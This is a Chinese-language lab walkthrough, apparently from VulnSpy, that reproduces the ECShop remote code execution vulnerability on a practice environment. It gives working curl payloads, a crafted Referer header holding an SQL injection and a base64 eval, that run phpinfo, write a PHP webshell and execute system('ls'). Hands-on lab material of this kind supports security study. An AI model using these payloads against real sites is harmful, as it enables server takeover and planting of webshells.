ECShop <= 2.x/3.6.x/3.0.x 版本远程代码执行高危漏洞利用


2018年9月1日,阿里云态势感知发布预警,近日利用ECShop全系列版本的远程代码执行漏洞进行批量化攻击量呈上升趋势,该漏洞可直接导致网站服务器沦陷,黑客可通过WEB攻击直接获得服务器权限,利用简单且危害较大。因此,阿里云安全专家提醒ECShop系统用户及时进行修复。 —— ECShop全系列版本远程代码执行高危漏洞分析

本文我们将使用 VulnSpy 的在线 ECSHOP 环境对漏洞进行复现和利用演示。

点击右上方 START TO HACK 按钮创建在线实验环境


漏洞分析

漏洞分析:ECShop <= 2.7.x 全系列版本远程代码执行高危漏洞利用


漏洞利用演示

1. 点击右上方 START TO HACK 按钮创建 ECShop实验环境

2. 创建完成后打开 ECSHOP 实验地址

3. 发送 Payload 执行 phpinfo();

将***.vsplate.me换成您的实验地址

在终端中执行:

curl http://***.vsplate.me/ecshop/user.php -d "action=login&vulnspy=phpinfo();exit;" -H 'Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:3:{s:3:"num";s:207:"*/ select 1,0x2720756e696f6e2f2a,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:2:"id";s:9:"'"'"' union/*";s:4:"name";s:3:"ads";}45ea207d7a2b68c49582d2d22adf953a'

4. 发送 Paylod 写入 webshell

在终端中执行:

curl http://***.vsplate.me/ecshop/user.php -d "action=login&vulnspy=eval/**/(base64_decode(ZmlsZV9wdXRfY29udGVudHMoJ3Z1bG5zcHkucGhwJywnPD9waHAgZXZhbCgkX1JFUVVFU1RbdnVsbnNweV0pOycpOw));exit;" \-H 'Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:3:{s:3:"num";s:207:"*/ select 1,0x2720756e696f6e2f2a,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:2:"id";s:9:"'"'"' union/*";s:4:"name";s:3:"ads";}45ea207d7a2b68c49582d2d22adf953a''

vulnspy@vsplate:~$ curl http://***.vsplate.me/ecshop/user.php \
-d "action=login&vulnspy=eval/**/(base64_decode(ZmlsZV9wdXRfY29udGVudHMoJ3Z1bG5zcHkucGhwJywnPD9waHAgZXZhbCgkX1JFUVVFU1RbdnVsbnNweV0pOycpOw));exit;" \
-H 'Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:3:{s:3:"num";s:207:"*/ select 1,0x2720756e696f6e2f2a,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:2:"id";s:9:"'"'"' union/*";s:4:"name";s:3:"ads";}45ea207d7a2b68c49582d2d22adf953a'
{$

5. 成功获取webshell

执行成功后会自动生成 http://***.vsplate.me/ecshop/vulnspy.php 文件,密码为 vulnspy

访问:http://***.vsplate.me/vulnspy.php?vulnspy=phpinfo();

访问:http://***.vsplate.me/vulnspy.php?vulnspy=system('ls');

参考

All rights reserved. © 2018 VULNSPY